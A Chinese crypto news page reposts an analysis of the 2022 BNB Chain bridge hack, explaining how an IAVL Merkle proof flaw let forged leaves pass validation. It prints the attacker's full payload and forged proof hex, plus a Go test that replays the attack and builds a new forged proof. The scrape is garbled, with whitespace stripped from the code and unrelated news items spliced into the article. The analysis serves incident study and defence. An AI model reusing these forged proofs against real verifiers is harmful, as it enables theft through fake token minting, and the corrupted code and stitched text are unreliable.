買以太坊 買以太坊
Ctrl+D 買以太坊
ads
首頁 > Filecoin > Info

ROO:歐科云鏈鏈上衛士:BNBChain遭攻擊事件深度解析_PRO

Author:

Time:1900/1/1 0:00:00

事件背景

北京時間2022年10月7日凌晨,BNB??Chian跨鏈橋BSCTokenHub遭遇攻擊。黑客利用跨鏈橋漏洞分兩次共獲取200萬枚BNB,價值約5.66億美元。

漏洞分析

BSCTokenHub是BNB信標鏈和BNB鏈之間的跨鏈橋。BNB鏈使用預編譯合約0x65驗證BNB信標鏈提交的IAVL的Proof,但BNB鏈對提交的Proof邊界情況處理不足,它僅考慮了Proof只有一個Leaf的場景,對多個Leaves的處理邏輯不夠嚴謹。黑客構造了一個包含多Leaves的Proof數據,繞過BNBChain上的校驗,從而在BNB鏈造成了BNB增發。

以其中一次攻擊交易為例:0xebf83628ba893d35b496121fb8201666b8e09f3cbadf0e269162baa72efe3b8b

黑客構造輸入數據payload和proof,輸入參數通過validateMerkleProof校驗,返回值為true。

在后續IApplication(handlerContract).handleSynPackage處理中,合約給黑客增發100萬個BNB。

函數調用過程

交易首先調用CrossChain合約0x2000的handlePackage函數:

?functionhandlePackage(bytescalldatapayload,bytescalldataproof,uint64height,uint64packageSequence,uint8channelId)onlyInitonlyRelayer???sequenceInOrder(packageSequence,channelId)blockSynced(height)channelSupported(channelId)external{??bytesmemorypayloadLocal=payload;//fixerror:stacktoodeep,tryremovinglocalvariables??bytesmemoryproofLocal=proof;//fixerror:stacktoodeep,tryremovinglocalvariables?require(MerkleProof.validateMerkleProof(ILightClient(LIGHT_CLIENT_ADDR).getAppHash(height),STORE_NAME,generateKey(packageSequence,channelId),payloadLocal,proofLocal),"invalidmerkleproof");??addresspayableheaderRelayer=ILightClient(LIGHT_CLIENT_ADDR).getSubmitter(height);??......??if(packageType==SYN_PACKAGE){???addresshandlerContract=channelHandlerContractMap;???tryIApplication(handlerContract).handleSynPackage(channelIdLocal,msgBytes)returns(bytesmemoryresponsePayload){?if(responsePayload.length!=0){?????sendPackage(channelSendSequenceMap,channelIdLocal,encodePayload(ACK_PACKAGE,0,responsePayload));?????channelSendSequenceMap=channelSendSequenceMap1;????}???}???......??}??......??IRelayerIncentivize(INCENTIVIZE_ADDR).addReward(headerRelayer,msg.sender,relayFee,isRelayRewardFromSystemReward||packageType!=SYN_PACKAGE);?}?輸入參數{?"payload":"0x000000000000000000000000000000000000000000000000000000000000000000f870a0424e4200000000000000000000000000000000000000000000000000000000009400000000000000000000000000000000000000008ad3c21bcecceda100000094489a8756c18c0b8b24ec2a2b9ff3d4d447f79bec94489a8756c18c0b8b24ec2a2b9ff3d4d447f79bec846553f100",?"proof":"0x0a8d020a066961766c3a76120e00000100380200000000010dd85c1af201f0010aed010a2b0802100318b091c73422200c10f902d266c238a4ca9e26fa9bc36483cd3ebee4e263012f5e7f40c22ee4d20a4d0801100218b091c7342220e4fd47bffd1c06e67edad92b2bf9ca63631978676288a2aa99f95c459436ef632a20da657c1ffb86c684eb3e265361ef0fa4f9dfa670b45f9f91c5eb6ad84b21a4d112001a370a0e0000010038020000000000000002122011056c6919f02d966991c10721684a8d1542e44003f9ffb47032c18995d4ac7f18b091c7341a340a0e00000100380200000000010dd85c12202c3a561458f8527b002b5ec3cab2d308662798d6245d4588a4e6a80ebdfe30ac18010ad4050a0a6d756c746973746f726512036962631ac005be050abb050a110a066f7261636c6512070a0508b891c7340a0f0a046d61696e12070a0508b891c7340a350a08736c617368696e6712290a2708b891c7341220c8ccf341e6e695e7e1cb0ce4bf347eea0cc16947d8b4e934ec400b57c59d6f860a380a0b61746f6d69635f7377617012290a2708b891c734122042d4ecc9468f71a70288a95d46564bfcaf2c9f811051dcc5593dbef152976b010a110a0662726964676512070a0508b891c7340a300a0364657812290a2708b891c73412201773be443c27f61075cecdc050ce22eb4990c54679089e90afdc4e0e88182a230a2f0a02736312290a2708b891c7341220df7a0484b7244f76861b1642cfb7a61d923794bd2e076c8dbd05fc4ee29f3a670a330a06746f6b656e7312290a2708b891c734122064958c2f76fec1fa5d1828296e51264c259fa264f499724795a740f48fc4731b0a320a057374616b6512290a2708b891c734122015d2c302143bdf029d58fe381cc3b54cedf77ecb8834dfc5dc3e1555d68f19ab0a330a06706172616d7312290a2708b891c734122050abddcb7c115123a5a4247613ab39e6ba935a3d4f4b9123c4fedfa0895c040a0a300a0361636312290a2708b891c734122079fb5aecc4a9b87e56231103affa5e515a1bdf3d0366490a73e087980b7f1f260a0e0a0376616c12070a0508b891c7340a300a0369626312290a2708b891c7341220e09159530585455058cf1785f411ea44230f39334e6e0f6a3c54dbf069df2b620a300a03676f7612290a2708b891c7341220db85ddd37470983b14186e975a175dfb0bf301b43de685ced0aef18d28b4e0420a320a05706169727312290a2708b891c7341220a78b556bc9e73d86b4c63ceaf146db71b12ac80e4c10dd0ce6eb09c99b0c7cfe0a360a0974696d655f6c6f636b12290a2708b891c73412204775dbe01d41cab018c21ba5c2af94720e4d7119baf693670e70a40ba2a52143",?"height":110217401,?"packageSequence":17684572,?"channelId":2}

歐科云鏈OKLink:比特幣網絡難度上調3.6%至17.56T:據歐科云鏈 OKLink 數據顯示,08月24日16:35,比特幣網絡在645120高度迎來難度調整,此次難度調整至17.56T,上升幅度達3.6%。當前比特幣全網未確認交易筆數約合8051筆,近一周平均出塊時間約為9.95分鐘。[2020/8/24]

handlePackage會進一步調用MerkleProof.validateMerkleProof對輸入的proof進行校驗:

//函數原型:functionvalidateMerkleProof(??bytes32appHash,??stringmemorystoreName,??bytesmemorykey,??bytesmemoryvalue,??bytesmemoryproof)//函數調用:MerkleProof.validateMerkleProof(??ILightClient(LIGHT_CLIENT_ADDR).getAppHash(height),??STORE_NAME,??generateKey(packageSequence,channelId),??payloadLocal,??proofLocal),//調用參數:{?"appHash":"0x72cda827a83531ca0fd7ac917a6b65649719aab0836722caafe0603147a52318",?"storeName":"ibc",?"key":"0x00000100380200000000010dd85c",?"value":"0x000000000000000000000000000000000000000000000000000000000000000000f870a0424e4200000000000000000000000000000000000000000000000000000000009400000000000000000000000000000000000000008ad3c21bcecceda100000094489a8756c18c0b8b24ec2a2b9ff3d4d447f79bec94489a8756c18c0b8b24ec2a2b9ff3d4d447f79bec846553f100",?"proof":"0x0a8d020a066961766c3a76120e00000100380200000000010dd85c1af201f0010aed010a2b0802100318b091c73422200c10f902d266c238a4ca9e26fa9bc36483cd3ebee4e263012f5e7f40c22ee4d20a4d0801100218b091c7342220e4fd47bffd1c06e67edad92b2bf9ca63631978676288a2aa99f95c459436ef632a20da657c1ffb86c684eb3e265361ef0fa4f9dfa670b45f9f91c5eb6ad84b21a4d112001a370a0e0000010038020000000000000002122011056c6919f02d966991c10721684a8d1542e44003f9ffb47032c18995d4ac7f18b091c7341a340a0e00000100380200000000010dd85c12202c3a561458f8527b002b5ec3cab2d308662798d6245d4588a4e6a80ebdfe30ac18010ad4050a0a6d756c746973746f726512036962631ac005be050abb050a110a066f7261636c6512070a0508b891c7340a0f0a046d61696e12070a0508b891c7340a350a08736c617368696e6712290a2708b891c7341220c8ccf341e6e695e7e1cb0ce4bf347eea0cc16947d8b4e934ec400b57c59d6f860a380a0b61746f6d69635f7377617012290a2708b891c734122042d4ecc9468f71a70288a95d46564bfcaf2c9f811051dcc5593dbef152976b010a110a0662726964676512070a0508b891c7340a300a0364657812290a2708b891c73412201773be443c27f61075cecdc050ce22eb4990c54679089e90afdc4e0e88182a230a2f0a02736312290a2708b891c7341220df7a0484b7244f76861b1642cfb7a61d923794bd2e076c8dbd05fc4ee29f3a670a330a06746f6b656e7312290a2708b891c734122064958c2f76fec1fa5d1828296e51264c259fa264f499724795a740f48fc4731b0a320a057374616b6512290a2708b891c734122015d2c302143bdf029d58fe381cc3b54cedf77ecb8834dfc5dc3e1555d68f19ab0a330a06706172616d7312290a2708b891c734122050abddcb7c115123a5a4247613ab39e6ba935a3d4f4b9123c4fedfa0895c040a0a300a0361636312290a2708b891c734122079fb5aecc4a9b87e56231103affa5e515a1bdf3d0366490a73e087980b7f1f260a0e0a0376616c12070a0508b891c7340a300a0369626312290a2708b891c7341220e09159530585455058cf1785f411ea44230f39334e6e0f6a3c54dbf069df2b620a300a03676f7612290a2708b891c7341220db85ddd37470983b14186e975a175dfb0bf301b43de685ced0aef18d28b4e0420a320a05706169727312290a2708b891c7341220a78b556bc9e73d86b4c63ceaf146db71b12ac80e4c10dd0ce6eb09c99b0c7cfe0a360a0974696d655f6c6f636b12290a2708b891c73412204775dbe01d41cab018c21ba5c2af94720e4d7119baf693670e70a40ba2a52143"}

港股收盤:歐科云鏈收跌4.88%,火幣科技收跌7.82%:金色財經報道,今日港股收盤,恒生指數收盤下跌510.89點,跌幅2.00%,報24970.69點,歐科集團旗下歐科云鏈(01499.HK)報0.195港元,收跌4.88%,火幣科技(01611.HK)報3.42港元,收跌7.82%,雄岸科技(01647.HK)報0.229港元,收跌3.38%。[2020/7/16]

MerkleProof相關代碼可以看到,實際的驗證邏輯是使用預編譯合約0x65完成:https://github.com/bnb-chain/bsc-genesis-contract/blob/master/contracts/MerkleProof.sol#L66

??uint256memoryresult;??/*solium-disable-next-line*/??assembly{??//callvalidateMerkleProofprecompilecontract??//Contractaddress:0x65???ifiszero(staticcall(not(0),0x65,input,length,result,0x20)){}??}??returnresult==0x01;

系統預編譯合約0x65對應iavlMerkleProofValidate功能:https://github.com/bnb-chain/bsc/blob/f3fd0f8bffb3b57a5a5d3f3699617e6afb757b33/core/vm/contracts.go#L81

系統合約0x65實現代碼如下,主要邏輯為使用DecodeKeyValueMerkleProof解碼輸入參數,并調用Validate進行校驗:https://github.com/bnb-chain/bsc/blob/master/core/vm/contracts_lightclient.go#L106

func(c*iavlMerkleProofValidate)Run(inputbyte)(resultbyte,errerror){??//returnnil,fmt.Errorf("suspend")??......??kvmp,err:=lightclient.DecodeKeyValueMerkleProof(input)iferr!=nil{??????returnnil,err??}??valid:=kvmp.Validate()if!valid{??????returnnil,fmt.Errorf("invalidmerkleproof")??}??result=make(byte,merkleProofValidateResultLength)??binary.BigEndian.PutUint64(result,0x01)??returnresult,nil}

其中kvmp.Validate()實現代碼如下:https://github.com/bnb-chain/bsc/blob/master/core/vm/lightclient/types.go#L220-L234

func(kvmp*KeyValueMerkleProof)Validate()bool{??prt:=DefaultProofRuntime()??kp:=merkle.KeyPath{}??kp=kp.AppendKey(byte(kvmp.StoreName),merkle.KeyEncodingURL)??kp=kp.AppendKey(kvmp.Key,merkle.KeyEncodingURL)??iflen(kvmp.Value)==0{????err:=prt.VerifyAbsence(kvmp.Proof,kvmp.AppHash,kp.String())????returnerr==nil??}??err:=prt.VerifyValue(kvmp.Proof,kvmp.AppHash,kp.String(),kvmp.Value)??returnerr==nil}

DefaultProofRuntime構造函數使用IAVL庫進行Proof的驗證:

import(??"bytes"??"fmt"??"github.com/tendermint/iavl"??"github.com/tendermint/tendermint/crypto/merkle"??cmn"github.com/tendermint/tendermint/libs/common")......funcDefaultProofRuntime()(prt*merkle.ProofRuntime){??prt=merkle.NewProofRuntime()??prt.RegisterOpDecoder(merkle.ProofOpSimpleValue,merkle.SimpleValueOpDecoder)??prt.RegisterOpDecoder(iavl.ProofOpIAVLValue,iavl.IAVLValueOpDecoder)??prt.RegisterOpDecoder(iavl.ProofOpIAVLAbsence,iavl.IAVLAbsenceOpDecoder)??prt.RegisterOpDecoder(ProofOpMultiStore,MultiStoreProofOpDecoder)??return}IAVL代碼問題

IAVL的Proof校驗過程中,Hash計算存在漏洞,導致黑客可以在Proof添加數據,但計算Hash時并沒有用到添加的數據。詳細分析如下:

在len(pin.Left)不為0的分支中,計算Hash并沒有使用pin.Right數據。黑客利用該處漏洞構造數據,添加proof.LeftPath.Right數據,但是該數據并不參與Hash計算。https://github.com/cosmos/iavl/blob/master/proof.go#L79-L93

歐科云鏈OKLink正式上線DASH區塊鏈瀏覽器:北京時間2020年7月13日,歐科云鏈OKLink正式上線DASH區塊鏈瀏覽器。該瀏覽器延續其他幣種瀏覽器基本功能外,OKLink DASH瀏覽器全網首推DASH礦池排名數據,還將陸續添加更多專業統計數據。

歐科云鏈OKLink是區塊鏈大數據上市公司打造的區塊鏈信息服務網站,旨在利用區塊鏈+大數據技術為用戶提供高可用的區塊鏈信息服務。[2020/7/13]

func(pinProofInnerNode)Hash(childHashbyte)(byte,error){????hasher:=sha256.New()????buf:=bufPool.Get().(*bytes.Buffer)????buf.Reset()????deferbufPool.Put(buf)????err:=encoding.EncodeVarint(buf,int64(pin.Height))????iferr==nil{????????err=encoding.EncodeVarint(buf,pin.Size)????}????iferr==nil{????????err=encoding.EncodeVarint(buf,pin.Version)????}iflen(pin.Left)==0{iferr==nil{????????????err=encoding.EncodeBytes(buf,childHash)????????}iferr==nil{????????????err=encoding.EncodeBytes(buf,pin.Right)????????}????}else{iferr==nil{????????????err=encoding.EncodeBytes(buf,pin.Left)????????}iferr==nil{????????????err=encoding.EncodeBytes(buf,childHash)????????}????}????iferr!=nil{????????returnnil,fmt.Errorf("failedtohashProofInnerNode:%v",err)????}????_,err=hasher.Write(buf.Bytes())????iferr!=nil{????????returnnil,err????}????returnhasher.Sum(nil),nil}

根據上述分析,正常數據組織結構如下,proof.LeftPath.Right為空值,計算得到正確的Hash。

proof.LeftPath=len(2)

proof.LeftPath是一個正常數據,proof.LeftPath.Left是一個正常數據,proof.LeftPath.Right空值

proof.InnerNodes=len(0)

proof.Leaves=len(1),proof.Leaves是一個正常數據

黑客構造攻擊數據結構如下,添加proof.LeftPath.Right數據,且該數據不參與Hash計算。

proof.LeftPath=len(2)

proof.LeftPath是一個正常數據,proof.LeftPath.Left是一個正常數據,proof.LeftPath.Right是一個偽造數據

proof.InnerNodes=len(1),InnerNodes=nil

proof.Leaves=len(2),proof.Leaves是一個正常數據,proof.Leaves是一個偽造數據

且proof.LeftPath.Right=COMPUTEHASH(proof.Leaves)

IAVL的Proof校驗代碼如下,主體邏輯為COMPUTEHASH遞歸調用。由于lpath.Right也為黑客輸入數據,使得黑客構造的數據能夠通過bytes.Equal(derivedRoot,lpath.Right)的校驗,并返回上一輪COMPUTEHASH通過proof.Leaves計算的結果,該結果為正常數值,從而繞過了IAVL的Proof校驗。

https://github.com/cosmos/iavl/blob/master/proof_range.go#L222-L309

func(proof*RangeProof)_computeRootHash()(rootHashbyte,treeEndbool,errerror){?...??varCOMPUTEHASHfunc(pathPathToLeaf,rightmostbool)(hashbyte,treeEndbool,donebool,errerror)??//rightmost:istherootarightmostchildofthetree???//treeEnd:trueiffthelastleafisthelastitemofthetree.??//Returnsthe(possiblyintermediate,possiblyroot)hash.??COMPUTEHASH=func(pathPathToLeaf,rightmostbool)(hashbyte,treeEndbool,donebool,errerror){??????//Popnextleaf.??????nleaf,rleaves:=leaves,leaves??????leaves=rleaves??????//Computehash.??????hash,err=(pathWithLeaf{??????????Path:path,??????????Leaf:nleaf,??????}).computeRootHash()??????iferr!=nil{??????????returnnil,treeEnd,false,err??????}??????//Ifwedon'thaveanyleavesleft,we'redone.??????iflen(leaves)==0{??????????rightmost=rightmost&&path.isRightmost()??????????returnhash,rightmost,true,nil??????}??????//Provealongpath(untilwerunoutofleaves).??????forlen(path)>0{??????????//Droptheleaf-most(last-most)innernodesfrompath??????????//untilweencounteronewithalefthash.??????????//Weassumethattheleftsideisalreadyverified.??????????//rpath:restofpath??????????//lpath:lastpathitem??????????rpath,lpath:=path,path??????????path=rpath??????????iflen(lpath.Right)==0{??????????????continue??????????}??????????//Popnextinners,aPathToLeaf(e.g.ProofInnerNode).??????????inners,rinnersq:=innersq,innersq??????????innersq=rinnersq??????????//Recursivelyverifyinnersagainstremainingleaves.??????????derivedRoot,treeEnd,done,err:=COMPUTEHASH(inners,rightmost&&rpath.isRightmost())??????????iferr!=nil{??????????????returnnil,treeEnd,false,errors.Wrap(err,"recursiveCOMPUTEHASHcall")??????????}??????????if!bytes.Equal(derivedRoot,lpath.Right){returnnil,treeEnd,false,errors.Wrapf(ErrInvalidRoot,"intermediateroothash%Xdoesn'tmatch,got%X",lpath.Right,derivedRoot)??????????}ifdone{returnhash,treeEnd,true,nil??????????}??????}??????//We'renotdoneyet(leavesleftover).Noerror,notdoneeither.??????//Technicallyifrightmost,weknowthere'sanerror"leftoverleaves??????//--malformedproof",butwereturnthatatthetoplevel,below.??????returnhash,false,false,nil??}??//Verify!??path:=proof.LeftPath??rootHash,treeEnd,done,err:=COMPUTEHASH(path,true)??iferr!=nil{??????returnnil,treeEnd,errors.Wrap(err,"rootCOMPUTEHASHcall")??}elseif!done{??????returnnil,treeEnd,errors.Wrap(ErrInvalidProof,"leftoverleaves--malformedproof")??}??//Ok!??returnrootHash,treeEnd,nil}

港股開盤:歐科云鏈上漲1.50%,火幣科技上漲0.64%:金色財經報道,港股開盤,香港恒生指數開盤下跌61.81點,跌幅0.27%,報23001.76點,歐科集團旗下歐科云鏈(01499.HK)報0.203點,開盤上漲1.50%;火幣科技(01611.HK)報3.14點,開盤上漲0.64%,雄岸科技(01647.HK)報0.230點,開盤平盤。[2020/3/17]

黑客攻擊構造的數據中,包括了IAVL:V和multistore相關數據,multistore數據也是基于IAVL進行操作,原理是一樣的,不再進行詳細分析。

這次IAVLProof暴露的問題在于,數據局部的變化無法反應到整體,使得校驗發生錯誤。在Cosmos生態中,IBC使用ICS23來做數據的校驗處理,ICS23與IAVLProof校驗不同點在于,ICS23會對所有的“葉子節點”的值進行數據校驗,最后計算得出的根Hash再與鏈上數據進行校驗,OKC采用的是ICS23的Prove,因此不存在BNBChain這次遇到的安全漏洞。

測試驗證代碼

利用黑客攻擊交易數據,基于BNBChain單元測試代碼,增加了基于黑客攻擊交易的測試用例,可以完整復現黑客的攻擊交易。單元測試代碼利用iavlMerkleProofValidate.Run接口驗證輸入數據,即相當于調用預編譯合約。https://github.com/BananaLF/bsc/blob/bsc-hack/core/vm/contracts_lightclient_test.go#L99-L100

iavlMerkleProofValidateContract:=iavlMerkleProofValidate{}success,err:=iavlMerkleProofValidateContract.Run(input)

利用黑客攻擊交易數據,構造新的payload數據為value:=byte(“okctesthack”),并對proof相應數據進行了修改,即修改proof.LeftPath.Right和proof.Leaves對應的數據,新構造的數據可以通過okcIavlMerkleProofValidate校驗,即修改了黑客數據也能通過校驗。另外,如下單元測試代碼對原始黑客數據和修改后的數據兩種case都進行了校驗,且校驗都能成功,從而說明如下測試代碼利用本文所述漏洞成功進行了復現。https://github.com/BananaLF/bsc/commit/697c5cd73a755a7c93c0ed6c57d069e17f807958

funcTestTmHeaderValidateAndMerkleProofValidateTest(t*testing.T){????testCases:=struct{????????name?string????????valuebyte????????proofbyte??}{????{??????//datasourcehttps://bscscan.com/tx/0xebf83628ba893d35b496121fb8201666b8e09f3cbadf0e269162baa72efe3b8b??????"hackdata",??????func()byte{??????????value,err:=hex.DecodeString("000000000000000000000000000000000000000000000000000000000000000000f870a0424e4200000000000000000000000000000000000000000000000000000000009400000000000000000000000000000000000000008ad3c21bcecceda100000094489a8756c18c0b8b24ec2a2b9ff3d4d447f79bec94489a8756c18c0b8b24ec2a2b9ff3d4d447f79bec846553f100")??????????require.NoError(t,err)??????????returnvalue??????}(),??????func()byte{??????????proofBytes,err:=hex.DecodeString("0a8d020a066961766c3a76120e00000100380200000000010dd85c1af201f0010aed010a2b0802100318b091c73422200c10f902d266c238a4ca9e26fa9bc36483cd3ebee4e263012f5e7f40c22ee4d20a4d0801100218b091c7342220e4fd47bffd1c06e67edad92b2bf9ca63631978676288a2aa99f95c459436ef632a20da657c1ffb86c684eb3e265361ef0fa4f9dfa670b45f9f91c5eb6ad84b21a4d112001a370a0e0000010038020000000000000002122011056c6919f02d966991c10721684a8d1542e44003f9ffb47032c18995d4ac7f18b091c7341a340a0e00000100380200000000010dd85c12202c3a561458f8527b002b5ec3cab2d308662798d6245d4588a4e6a80ebdfe30ac18010ad4050a0a6d756c746973746f726512036962631ac005be050abb050a110a066f7261636c6512070a0508b891c7340a0f0a046d61696e12070a0508b891c7340a350a08736c617368696e6712290a2708b891c7341220c8ccf341e6e695e7e1cb0ce4bf347eea0cc16947d8b4e934ec400b57c59d6f860a380a0b61746f6d69635f7377617012290a2708b891c734122042d4ecc9468f71a70288a95d46564bfcaf2c9f811051dcc5593dbef152976b010a110a0662726964676512070a0508b891c7340a300a0364657812290a2708b891c73412201773be443c27f61075cecdc050ce22eb4990c54679089e90afdc4e0e88182a230a2f0a02736312290a2708b891c7341220df7a0484b7244f76861b1642cfb7a61d923794bd2e076c8dbd05fc4ee29f3a670a330a06746f6b656e7312290a2708b891c734122064958c2f76fec1fa5d1828296e51264c259fa264f499724795a740f48fc4731b0a320a057374616b6512290a2708b891c734122015d2c302143bdf029d58fe381cc3b54cedf77ecb8834dfc5dc3e1555d68f19ab0a330a06706172616d7312290a2708b891c734122050abddcb7c115123a5a4247613ab39e6ba935a3d4f4b9123c4fedfa0895c040a0a300a0361636312290a2708b891c734122079fb5aecc4a9b87e56231103affa5e515a1bdf3d0366490a73e087980b7f1f260a0e0a0376616c12070a0508b891c7340a300a0369626312290a2708b891c7341220e09159530585455058cf1785f411ea44230f39334e6e0f6a3c54dbf069df2b620a300a03676f7612290a2708b891c7341220db85ddd37470983b14186e975a175dfb0bf301b43de685ced0aef18d28b4e0420a320a05706169727312290a2708b891c7341220a78b556bc9e73d86b4c63ceaf146db71b12ac80e4c10dd0ce6eb09c99b0c7cfe0a360a0974696d655f6c6f636b12290a2708b891c73412204775dbe01d41cab018c21ba5c2af94720e4d7119baf693670e70a40ba2a52143")??????????require.NoError(t,err)??????????returnproofBytes??????}(),????},????{??????"okctestdata",??????func()byte{??????????value:=byte("okctesthack")??????????returnvalue??????}(),??????func()byte{??????????proofBytes,err:=hex.DecodeString("0a8d020a066961766c3a76120e00000100380200000000010dd85c1af201f0010aed010a2b0802100318b091c73422200c10f902d266c238a4ca9e26fa9bc36483cd3ebee4e263012f5e7f40c22ee4d20a4d0801100218b091c7342220e4fd47bffd1c06e67edad92b2bf9ca63631978676288a2aa99f95c459436ef632a20862869344b449b596df9b3889117c7696b0838ecc112ce33b147ad28e587f71712001a370a0e0000010038020000000000000002122011056c6919f02d966991c10721684a8d1542e44003f9ffb47032c18995d4ac7f18b091c7341a340a0e00000100380200000000010dd85c12205d6de1244e019deb3f01c41555d6bb458af5de0be9f14fc8a75abb97c8dbc68018010ad4050a0a6d756c746973746f726512036962631ac005be050abb050a110a066f7261636c6512070a0508b891c7340a0f0a046d61696e12070a0508b891c7340a350a08736c617368696e6712290a2708b891c7341220c8ccf341e6e695e7e1cb0ce4bf347eea0cc16947d8b4e934ec400b57c59d6f860a380a0b61746f6d69635f7377617012290a2708b891c734122042d4ecc9468f71a70288a95d46564bfcaf2c9f811051dcc5593dbef152976b010a110a0662726964676512070a0508b891c7340a300a0364657812290a2708b891c73412201773be443c27f61075cecdc050ce22eb4990c54679089e90afdc4e0e88182a230a2f0a02736312290a2708b891c7341220df7a0484b7244f76861b1642cfb7a61d923794bd2e076c8dbd05fc4ee29f3a670a330a06746f6b656e7312290a2708b891c734122064958c2f76fec1fa5d1828296e51264c259fa264f499724795a740f48fc4731b0a320a057374616b6512290a2708b891c734122015d2c302143bdf029d58fe381cc3b54cedf77ecb8834dfc5dc3e1555d68f19ab0a330a06706172616d7312290a2708b891c734122050abddcb7c115123a5a4247613ab39e6ba935a3d4f4b9123c4fedfa0895c040a0a300a0361636312290a2708b891c734122079fb5aecc4a9b87e56231103affa5e515a1bdf3d0366490a73e087980b7f1f260a0e0a0376616c12070a0508b891c7340a300a0369626312290a2708b891c7341220e09159530585455058cf1785f411ea44230f39334e6e0f6a3c54dbf069df2b620a300a03676f7612290a2708b891c7341220db85ddd37470983b14186e975a175dfb0bf301b43de685ced0aef18d28b4e0420a320a05706169727312290a2708b891c7341220a78b556bc9e73d86b4c63ceaf146db71b12ac80e4c10dd0ce6eb09c99b0c7cfe0a360a0974696d655f6c6f636b12290a2708b891c73412204775dbe01d41cab018c21ba5c2af94720e4d7119baf693670e70a40ba2a52143")??????????require.NoError(t,err)??????????returnproofBytes??????}(),????},??}??for_,tc:=rangetestCases{????okcIavlMerkleProofValidate(tc.value,tc.proof,t)??}}funcokcIavlMerkleProofValidate(value,proofBytesbyte,t*testing.T){??key,err:=hex.DecodeString("00000100380200000000010dd85c")//thisequaltogenerateKey(17684572,2)??require.NoError(t,err)??newAppHash,err:=hex.DecodeString("72cda827a83531ca0fd7ac917a6b65649719aab0836722caafe0603147a52318")//thisisgotbyhackdata??require.NoError(t,err)??merkleProofInput:=make(byte,3232len(key)32len(value)32len(proofBytes))??copy(merkleProofInput,"ibc")??binary.BigEndian.PutUint64(merkleProofInput,uint64(len(key)))??copy(merkleProofInput,key)??binary.BigEndian.PutUint64(merkleProofInput,uint64(len(value)))??copy(merkleProofInput,value)??copy(merkleProofInput,newAppHash)??copy(merkleProofInput,proofBytes)??totalLengthPrefix:=make(byte,32)??binary.BigEndian.PutUint64(totalLengthPrefix,0)??binary.BigEndian.PutUint64(totalLengthPrefix,0)??binary.BigEndian.PutUint64(totalLengthPrefix,0)??binary.BigEndian.PutUint64(totalLengthPrefix,uint64(len(merkleProofInput)))??input:=append(totalLengthPrefix,merkleProofInput...)??iavlMerkleProofValidateContract:=iavlMerkleProofValidate{}??success,err:=iavlMerkleProofValidateContract.Run(input)??require.NoError(t,err,err)??expectedResult:=make(byte,32)??binary.BigEndian.PutUint64(expectedResult,0x01)??require.Equal(t,expectedResult,success。

行情 | 港股開盤:歐科云鏈平盤,火幣科技下跌0.51%:金色財經報道,港股開盤,香港恒生指數開盤下跌529.56點,跌幅1.98%,報26249.06點;歐科集團旗下歐科云鏈(01499.HK)報0.235點,開盤平盤;火幣科技(01611.HK)報3.87點,下跌0.51%。[2020/2/28]

事件過程

被攻擊全過程可查看上一篇文章:鏈上衛士:BNBChain遭攻擊時間軸梳理。OKLink多鏈瀏覽器已對BNBChain黑客地址進行風險標簽標記,關于此次被盜后續,鏈上衛士團隊將進一步追蹤案件細節并及時同步。

Tags:ROOPROProofVALCROOGE價格Project WITHEvident Proof Transaction Tokenvaluechain

Filecoin
COIN:BitVito幣位:加密借貸Sovryn完成540萬美元融資_Tongtongcoin

加密借貸服務協議Sovryn宣布完成540萬美元新一輪融資,GeneralCatalyst領投.

1900/1/1 0:00:00
ETH:山寨幣大崩盤即將來臨——這就是為什么和期待什么_IETHV價格

加密貨幣市場的表現一直呈下降趨勢,比特幣、幣安幣等加密貨幣的價值都在持續下跌。隨著下跌趨勢的持續,市場失去價值的可能性增加.

1900/1/1 0:00:00
USD:邊學邊賺:CoinW 送您100 USDT 跟單學習金_Coinw

親愛的CoinW用戶: ?為了讓更多用戶了解跟單,感受到跟單的便捷和優勢,CoinW將對新跟單用戶發放100USDT的學習金,助力大家邊學邊賺.

1900/1/1 0:00:00
ETW:BNB Chain黑客地址當前地址余額超7億美元_Cens World

10月7日消息,據歐科云鏈鏈上衛士安全團隊監測,被OKLink多鏈瀏覽器標記為“Hack”的BNBChain被盜案黑客地址.

1900/1/1 0:00:00
GATE:Gate.io will list PUMLx(PUMLX)_gate.io安卓下載app官網

Gate.ioisgoingtocommencePUMLx(PUMLX)tradingat12:00PM(UTC)onOctober7th.

1900/1/1 0:00:00
BTC:盤中寶——比特幣礦工收入處于長期下降趨勢,BTC趨于窄幅震蕩_區塊鏈

CryptoQuant首席執行官KiYoungJu表示,當大量USDC流入交易所時,比特幣的下一輪拋物線牛市可能開始;目前94%的USDC供應來自外部交易平臺.

1900/1/1 0:00:00
ads